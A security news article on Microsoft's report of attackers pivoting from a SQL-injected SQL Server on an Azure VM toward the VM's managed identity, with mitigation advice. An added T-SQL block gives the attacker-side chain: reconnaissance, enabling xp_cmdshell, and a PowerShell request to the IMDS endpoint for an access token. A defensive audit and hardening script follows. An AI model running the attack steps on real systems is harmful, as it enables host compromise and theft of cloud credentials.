Last Updated on November 8, 2024 10:49 am CET
Azure Cloud VMs at Security Risk as Hackers Rely Heavily on Breached SQL Servers
Microsoft warns of hackers targeting Azure Cloud VMs via SQL servers and offers security recommendations to counter it.
Microsoft Security has warned of attackers targeting Azure Cloud VMs by pivoting from compromised SQL Server instances. In its write-up of the campaign, Microsoft's researchers note that this style of lateral movement, from a compromised workload to the cloud resources its identity can reach, has already been documented in attacks on virtual machines and Kubernetes clusters; what is new is seeing it carried out from SQL Server.
The victim's environment was first breached through a SQL injection vulnerability in an application. Because the application's database login held elevated permissions on the SQL Server instance running in an Azure Virtual Machine, the attackers could execute arbitrary SQL through that login and harvest reconnaissance data: the databases, schemas and table names present, the database version, the read/write/delete permissions the login held, and the instance's network configuration.
Hackers Employ Intrusive Techniques
Using the permissions granted to the compromised application's login, the attackers enabled the 'xp_cmdshell' extended stored procedure, which runs operating system commands from within SQL and turns the database into a foothold on the host. They then used a publicly accessible service for data exfiltration; because traffic to such a service looks legitimate, it draws less suspicion from security products than a connection to attacker-controlled infrastructure would.
Next, the attackers tried to reach the Instance Metadata Service (IMDS), the link-local endpoint every Azure VM can query, to obtain an access token for the managed identity attached to the VM hosting the SQL Server instance. In Azure, managed identities are commonly assigned to resources so they can authenticate to other cloud services without stored credentials. A stolen token gives the attacker a path to every cloud resource that identity has permissions on, for as long as the token remains valid.
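The chain described above, reconstructed in T-SQL as an added example (this is not code from Microsoft's report, and the exact commands the attackers ran are not published). It assumes the injected login is a member of sysadmin, that the VM hosting SQL Server has a managed identity assigned, and that the attacker can run PowerShell on the host through xp_cmdshell; the IMDS endpoint, its mandatory `Metadata: true` header and the `api-version` are Azure's documented values.

```sql
-- Added example: post-injection steps from the attacker's side, in T-SQL.
-- Assumptions: the injected login holds sysadmin (or at least ALTER SETTINGS),
-- the Azure VM has a managed identity, and PowerShell is available on the host.

-- 1. Reconnaissance through the injected SQL context.
SELECT @@VERSION AS version, SERVERPROPERTY('MachineName') AS host;
SELECT name FROM sys.databases;                                   -- databases
SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;   -- schemas and tables
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;               -- 1 means steps 2-4 will work
SELECT permission_name FROM fn_my_permissions(NULL, 'SERVER');   -- e.g. CONTROL SERVER, ALTER SETTINGS
SELECT local_net_address, local_tcp_port, client_net_address     -- network configuration
FROM sys.dm_exec_connections
WHERE session_id = @@SPID;

-- 2. Enable xp_cmdshell. sp_configure needs ALTER SETTINGS, which sysadmin implies;
--    'show advanced options' must be on before the xp_cmdshell option is visible.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. OS commands now run under the SQL Server service account on the VM.
EXEC xp_cmdshell 'whoami';

-- 4. Ask IMDS for the managed identity's access token. IMDS is link-local
--    (169.254.169.254), reachable only from inside the VM, and refuses requests
--    without the Metadata: true header; the resource selects the token audience.
DECLARE @cmd NVARCHAR(MAX) =
      N'powershell -NoProfile -Command "'
    + N'Invoke-RestMethod -Headers @{Metadata=''true''} '
    + N'-Uri ''http://169.254.169.254/metadata/identity/oauth2/token'
    + N'?api-version=2018-02-01&resource=https://management.azure.com/'' '
    + N'| ConvertTo-Json"';
EXEC xp_cmdshell @cmd;   -- returns JSON containing access_token, expires_on, resource
```

Every step after the first depends on the login that the injection runs as: without ALTER SETTINGS the sp_configure calls in step 2 fail with a permission error, and nothing past that point is reachable from SQL. That is the link the least-privilege advice later in the article is meant to cut.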
Microsoft’s Action Plan to Counter the Attacks
Based on the attack patterns observed, Microsoft recommends its Microsoft Defender suite, specifically Defender for Cloud and Defender for Endpoint, which can flag SQL injection attempts and suspicious SQLCMD activity, both of which appeared in the attack under observation.
To strengthen defenses further, Microsoft recommends applying the principle of least privilege when assigning permissions to users and application logins. This step matters because enabling xp_cmdshell requires server-level configuration rights: if the application's login does not have them, the chain from injection to host to cloud identity breaks at its first link, and the odds of successful lateral movement fall sharply. Microsoft has also published hunting queries for Microsoft Defender and Microsoft Sentinel in the appendix of the official report.
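The checks and fixes a DBA would run on the instance itself, as an added T-SQL example (not Microsoft's hunting queries, which are KQL for Defender and Sentinel, and not code from the report). The login name `app_login` and database name `appdb` are placeholders for the application's own.

```sql
-- Added example: close the xp_cmdshell path on the instance and verify least privilege.
-- Assumed names: [app_login] is the application's SQL login, [appdb] is its database.

-- 1. Is xp_cmdshell enabled right now? value_in_use = 1 means OS commands are
--    reachable from SQL; on an instance that does not need it, expect 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 2. Who could switch it on? sysadmin members and holders of CONTROL SERVER or
--    ALTER SETTINGS can run sp_configure. An application login belongs in neither list.
SELECT m.name AS login_name
FROM sys.server_role_members rm
JOIN sys.server_principals m ON m.principal_id = rm.member_principal_id
JOIN sys.server_principals r ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin';

SELECT pr.name AS login_name, pe.permission_name
FROM sys.server_permissions pe
JOIN sys.server_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.state = 'G'
  AND pe.permission_name IN ('CONTROL SERVER', 'ALTER SETTINGS');

-- 3. Disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Least privilege for the application: strip server-level rights and grant only
--    data access in its own database. An injection then yields reads and writes
--    there, but no sp_configure, no xp_cmdshell and no path to the host or IMDS.
IF IS_SRVROLEMEMBER('sysadmin', 'app_login') = 1
    ALTER SERVER ROLE sysadmin DROP MEMBER [app_login];

USE [appdb];
IF NOT EXISTS (SELECT 1 FROM sys.database_principals WHERE name = 'app_login')
    CREATE USER [app_login] FOR LOGIN [app_login];
ALTER ROLE db_datareader ADD MEMBER [app_login];
ALTER ROLE db_datawriter ADD MEMBER [app_login];

-- 5. Verify from the application's own security context: both columns should be 0.
EXECUTE AS LOGIN = 'app_login';
SELECT IS_SRVROLEMEMBER('sysadmin')                      AS is_sysadmin,
       HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS')   AS can_alter_settings;
REVERT;
```

Step 5 is the one worth keeping as a recurring check: rerun it after any schema migration or tooling change, since it is common for an application login to be promoted to sysadmin "temporarily" during a deployment and never demoted. Disabling xp_cmdshell alone is not sufficient, because a login that can run sp_configure can simply turn it back on.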
Although the attackers failed to exploit the Instance Metadata Service in this case because of errors on their part, the technique itself remains viable and poses a serious threat to any organization running SQL Server on a cloud VM that carries a privileged managed identity.